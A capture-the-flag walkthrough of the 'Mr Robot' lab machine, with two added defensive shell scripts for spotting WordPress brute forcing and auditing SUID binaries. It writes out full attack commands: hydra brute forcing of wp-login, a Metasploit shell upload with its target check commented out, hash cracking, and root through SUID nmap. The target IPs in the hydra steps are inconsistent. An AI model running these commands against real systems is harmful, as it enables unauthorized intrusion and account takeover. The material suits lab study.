Mr Robot Walkthrough
Lab Environment
Attacker's Machine - Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 GNU/Linux
Vulnerable Machine - Mr Robot
Proof Of Concept
Command : arp-scan --local (scans for the machines connected to the local network)
vulnerable machine IP - 172.16.60.162
Scanning Phase
Now I will use nmap to scan the machine's IP further.
nmap -A 172.16.60.162 -Pn
Results : port 80 is open and an HTTP service is active, so I can browse to the IP.
Found nothing interesting, just the Mr Robot interface.
Since an HTTP service is active I decided to enumerate directories, and for that I fired up dirb.
Command : dirb http://172.16.60.162
Results : found many directories, including WordPress directories.
This confirmed that WordPress is in use.
Important directories from dirb results : http://172.16.60.162/robots.txt and http://172.16.60.162/wp-login
I explored these two in the browser one by one.
Browsing http://172.16.60.162/robots.txt
It listed two files: a dictionary file containing usernames and passwords, and our first flag.
Now I changed the URL to http://172.16.60.162/key-1-of-3.txt to read the flag.
After that I changed the URL to http://172.16.60.162/fsocity.dic to open the file; I got a download dialogue box, so I saved it.
When I opened the .dic file I found that many entries are repeated, so I sorted the list uniquely to drop the duplicates.
For that I opened a terminal and changed directory to Downloads, where I had saved the .dic file.
Command to sort the .dic file : sort -u fsocity.dic > /root/Desktop/unique.dic
Explanation of command :
sort -u - arranges the content in order and keeps only unique lines.
fsocity.dic - the file to be sorted uniquely.
/root/Desktop/unique.dic - the location and name of the new file in which the output is saved.
Now it's time to explore the second directory found by dirb, i.e. http://172.16.60.162/wp-login
There I found the WordPress login panel, which was pretty obvious.
Now I tried to brute force the login panel.
We have one dictionary to brute force the panel with.
I passed a random password, wedontcare, and brute forced the username.
How did I find the correct username?
WordPress has the property that if we provide a correct username with a wrong password, it gives a different error, i.e. the password for the username is incorrect, which tells us the username is correct.
So I passed the random password and used hydra to find the correct username first.
Command : hydra -vV -L /root/Desktop/unique.dic -p wedontcare 192.168.2.4 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
Let's break it down:
-vV : Verbose
-L /root/Desktop/unique.dic : Try all the usernames from the file unique.dic
-p wedontcare : Use a single fixed password; it doesn't matter (we're only interested in the username for now)
192.168.2.4 : The IP of the machine we're attacking
http-post-form : What we're trying to brute force, here an HTTP POST form
'/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
/wp-login.php : The path to where the form is located
log=^USER^&pwd=^PASS^&wp-submit=Log+In : The POST parameters to send. ^USER^ and ^PASS^ are placeholders that will be replaced with the actual values.
F=Invalid username : Consider an attempt a failure (F) if the response contains the text Invalid username
After a few minutes, we get:
[80][http-post-form] host: 192.168.2.4 login: elliot password: wedontcare
Now we know there is a WordPress user named elliot. Let's try to brute force his password using the same technique and wordlist.
Command : hydra -vV -l elliot -P /root/Desktop/unique.dic vm http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
Elliot’s password appears to be ER28-0652. We can indeed login to the WordPress administration interface using these credentials.
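The login endpoint that hydra hammered above is also where a defender sees the attack. As an added example (not part of the walkthrough), this POSIX shell function scans Apache combined access log lines for clients with many failed wp-login.php POSTs; WordPress answers a failed login with 200 (it re-renders the form) and a successful one with a 302, so it also reports whether a success followed the failures. The log lines, IPs and threshold are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the walkthrough): spot WordPress login brute forcing in an
# Apache combined access log. A failed wp-login.php POST gets a 200, a successful one a
# 302 redirect, so many 200s followed by a 302 from one client is a guessed password,
# not a user who mistyped once. Log lines are constructed and use documentation IP ranges.

SAMPLE_LOG='192.0.2.10 - - [10/Nov/2017:10:01:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/4.0 (Hydra)"
192.0.2.10 - - [10/Nov/2017:10:01:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/4.0 (Hydra)"
192.0.2.10 - - [10/Nov/2017:10:01:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/4.0 (Hydra)"
192.0.2.10 - - [10/Nov/2017:10:01:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/4.0 (Hydra)"
192.0.2.10 - - [10/Nov/2017:10:01:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/4.0 (Hydra)"
192.0.2.10 - - [10/Nov/2017:10:01:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/4.0 (Hydra)"
192.0.2.10 - - [10/Nov/2017:10:01:04 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/4.0 (Hydra)"
198.51.100.7 - - [10/Nov/2017:10:02:10 +0000] "GET /robots.txt HTTP/1.1" 200 41 "-" "curl/7.55"
198.51.100.7 - - [10/Nov/2017:10:02:11 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Nov/2017:10:02:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'

# detect_wp_bruteforce LOGTEXT THRESHOLD
# Prints "<ip> <failed-posts> then-success|no-success" for each client whose failed
# wp-login.php POSTs reach THRESHOLD; no output means nothing suspicious.
detect_wp_bruteforce() {
    printf '%s\n' "$1" | awk -v thr="$2" '
        # Combined log fields: $1 client, $6 "METHOD, $7 path, $9 status
        $6 == "\"POST" && $7 == "/wp-login.php" {
            if ($9 == 200) fail[$1]++
            else if ($9 == 302) ok[$1] = 1
        }
        END {
            for (ip in fail)
                if (fail[ip] >= thr)
                    printf "%s %d %s\n", ip, fail[ip], (ip in ok) ? "then-success" : "no-success"
        }' | sort
}

# With threshold 5 only the hydra client is reported; the one-typo user is not.
detect_wp_bruteforce "$SAMPLE_LOG" 5
```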
Now I fired up msfconsole, searched for a WordPress exploit and found one.
Exploit : exploit/unix/webapp/wp_admin_shell_upload
(But this exploit gave an error saying the target is not running WordPress, so I edited the module and commented out the check that raised the error; commented code is not executed, so the error no longer occurs.)
To comment it out I put # before the line raising the error.
Path of the module to edit: /usr/share/metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
Then I saved the edited module under the name wp_admin_shell_upload1 and used it in msfconsole.
Command : use exploit/unix/webapp/wp_admin_shell_upload1
Then I looked at the options the exploit requires.
I set them as follows to make the exploit ready to use:
Command : set USERNAME elliot
set PASSWORD ER28-0652
set LHOST 172.16.60.164
set TARGETURI http://172.16.60.162/wp-admin
set RHOST 172.16.60.162
Now simply type run or exploit to execute the exploit, and we get a meterpreter session.
Now I dropped into a shell to escalate privileges.
Command to get an interactive shell for privilege escalation : python -c 'import pty; pty.spawn("/bin/bash")'
Exploring the directories, I found the second flag and a password file in /home/robot.
I cracked the MD5 hash in the password file with hashcat and recovered the password.
Result of password - abcdefghijklmnopqrstuvwxyz
But I still could not read the second flag, so I made a guess: the password file was in robot's home directory, so robot could be the username, and I already had the password.
So I switched user, using robot as the username.
Command : su robot
Password : abcdefghijklmnopqrstuvwxyz
After switching to the robot user I was able to read the second flag.
I used nmap to get root.
nmap can theoretically execute commands as root if we manage to make it run them for us.
Command : nmap --interactive
It worked, and after that I got root with the help of a shell command.
Command: !sh
That gave me root access, and I finally found the last flag in the root folder.
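The nmap step only yields root because the binary runs set-user-ID root, which is the condition a hardening check should catch before an attacker does. As an added example (not from the walkthrough), this POSIX shell function inventories SUID files under a directory and flags any whose name is on a list of binaries that can hand their caller a shell; the list (only nmap here), the demo tree and its file names are assumptions constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the walkthrough): inventory SUID executables and flag the ones
# that can run arbitrary commands for whoever invokes them, which is how a robot shell
# became root via nmap --interactive. On a real host run audit_suid / as root so find can
# read every directory; the demo below builds a throwaway tree instead.

# Binaries known to spawn a shell for their caller; nmap is the walkthrough's case.
# Extend this list from your own hardening policy (assumption: one name per word).
SHELL_CAPABLE="nmap"

# audit_suid DIR
# Prints one line per SUID file: "<path> owner=<user> RISK|ok"
audit_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort | while IFS= read -r f; do
        owner=$(ls -ld "$f" | awk '{print $3}')   # third ls -l column is the owner
        name=${f##*/}
        verdict=ok
        for b in $SHELL_CAPABLE; do
            [ "$name" = "$b" ] && verdict=RISK
        done
        printf '%s owner=%s %s\n' "$f" "$owner" "$verdict"
    done
}

# count_risky DIR: number of SUID files flagged RISK, usable as a CI/hardening gate
count_risky() { audit_suid "$1" | grep -c ' RISK$' || true; }

# Demo tree (constructed): a fake SUID nmap, a SUID passwd-like binary, a normal file.
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/usr/local/bin" "$demo_dir/usr/bin"
: > "$demo_dir/usr/local/bin/nmap"; chmod 4755 "$demo_dir/usr/local/bin/nmap"
: > "$demo_dir/usr/bin/passwd";     chmod 4755 "$demo_dir/usr/bin/passwd"
: > "$demo_dir/usr/bin/ls";         chmod 0755 "$demo_dir/usr/bin/ls"

audit_suid "$demo_dir"          # lists nmap (RISK) and passwd (ok); ls has no SUID bit
echo "risky SUID binaries: $(count_risky "$demo_dir")"
```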